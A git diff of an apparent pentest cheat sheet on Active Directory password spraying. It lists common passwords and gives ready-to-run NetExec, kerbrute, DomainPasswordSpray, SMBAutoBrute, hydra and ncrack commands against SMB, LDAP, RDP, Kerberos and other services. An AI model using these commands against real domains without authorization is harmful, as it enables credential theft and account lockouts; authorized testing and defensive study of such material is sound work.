Pwd spraying update
parent
c2f815f5b0
commit
35e5d426b0
|
@ -6,75 +6,82 @@ Password spraying refers to the attack method that takes a large number of usern
|
||||||
|
|
||||||
Most of the time the best passwords to spray are :
|
Most of the time the best passwords to spray are :
|
||||||
|
|
||||||
- `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz`
|
- Passwords: `P@ssw0rd01`, `Password123`, `Password1`,
|
||||||
- `Welcome1`/`Welcome01`
|
- Common password: `Welcome1`/`Welcome01`, `Hello123`, `mimikatz`
|
||||||
- $Companyname1:`$Microsoft1`
|
- $Companyname1:`$Microsoft1`
|
||||||
- SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
|
- SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
|
||||||
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
|
- Default AD password with simple mutations such as number-1, special character iteration (`*`,`?`,`!`,`#`)
|
||||||
- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0)
|
- Empty Password: NT hash is `31d6cfe0d16ae931b73c59d7e0c089c0`
|
||||||
|
|
||||||
|
:warning: be careful with the account lockout !
|
||||||
## Kerberos pre-auth bruteforcing
|
|
||||||
|
|
||||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
|
||||||
|
|
||||||
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
|
||||||
|
|
||||||
* Username bruteforce
|
|
||||||
```powershell
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
|
||||||
```
|
|
||||||
* Password bruteforce
|
|
||||||
```powershell
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
|
||||||
```
|
|
||||||
* Password spray
|
|
||||||
```powershell
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Spray a pre-generated passwords list
|
## Spray a pre-generated passwords list
|
||||||
|
|
||||||
* Using `netexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
* Using [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)
|
||||||
```powershell
|
```powershell
|
||||||
netexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
nxc smb 10.0.0.1 -u /path/to/users.txt -p Password123
|
||||||
|
nxc smb 10.0.0.1 -u Administrator -p /path/to/passwords.txt
|
||||||
|
|
||||||
|
nxc smb targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc ldap targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc rdp targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc winrm targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc mssql targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc wmi targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
|
||||||
|
nxc ssh targets.txt -u Administrator -p Password123
|
||||||
|
nxc vnc targets.txt -u Administrator -p Password123
|
||||||
|
nxc ftp targets.txt -u Administrator -p Password123
|
||||||
|
nxc nfs targets.txt -u Administrator -p Password123
|
||||||
```
|
```
|
||||||
* Using `DomainPasswordSpray` to spray a password against all users of a domain.
|
|
||||||
|
* Using [hashcat/maskprocessor](https://github.com/hashcat/maskprocessor) to generate passwords following a specific rule
|
||||||
|
```powershell
|
||||||
|
nxc smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||||
|
```
|
||||||
|
|
||||||
|
* Using [dafthack/DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) to spray a password against all users of a domain.
|
||||||
```powershell
|
```powershell
|
||||||
# https://github.com/dafthack/DomainPasswordSpray
|
|
||||||
Invoke-DomainPasswordSpray -Password Summer2021!
|
Invoke-DomainPasswordSpray -Password Summer2021!
|
||||||
# /!\ be careful with the account lockout !
|
|
||||||
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
||||||
```
|
```
|
||||||
* Using `SMBAutoBrute`.
|
|
||||||
|
* Using [shellntel-acct/scripts/SMBAutoBrute](https://github.com/shellntel-acct/scripts/blob/master/Invoke-SMBAutoBrute.ps1).
|
||||||
```powershell
|
```powershell
|
||||||
|
Invoke-SMBAutoBrute -PasswordList "jennifer, yankees" -LockoutThreshold 3
|
||||||
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Spray passwords against the RDP service
|
|
||||||
|
|
||||||
* Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
|
|
||||||
```powershell
|
|
||||||
git clone https://github.com/xFreed0m/RDPassSpray
|
|
||||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
|
||||||
```
|
|
||||||
* Using [hydra](https://github.com/vanhauser-thc/thc-hydra) and [ncrack](https://github.com/nmap/ncrack) to target RDP services.
|
|
||||||
```powershell
|
|
||||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
|
||||||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## BadPwdCount attribute
|
## BadPwdCount attribute
|
||||||
|
|
||||||
> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.
|
> The number of times the user tried to log on to the account using an incorrect password. A value of `0` indicates that the value is unknown.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
|
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
|
||||||
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
|
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
|
||||||
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
|
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Kerberos pre-auth bruteforcing
|
||||||
|
|
||||||
|
Using [ropnop/kerbrute](https://github.com/ropnop/kerbrute), a tool to perform Kerberos pre-auth bruteforcing.
|
||||||
|
|
||||||
|
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
||||||
|
|
||||||
|
* Username bruteforce
|
||||||
|
```powershell
|
||||||
|
./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||||
|
```
|
||||||
|
* Password bruteforce
|
||||||
|
```powershell
|
||||||
|
./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||||
|
```
|
||||||
|
* Password spray
|
||||||
|
```powershell
|
||||||
|
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||||
|
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||||
|
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||||
|
```
|
Loading…
Reference in New Issue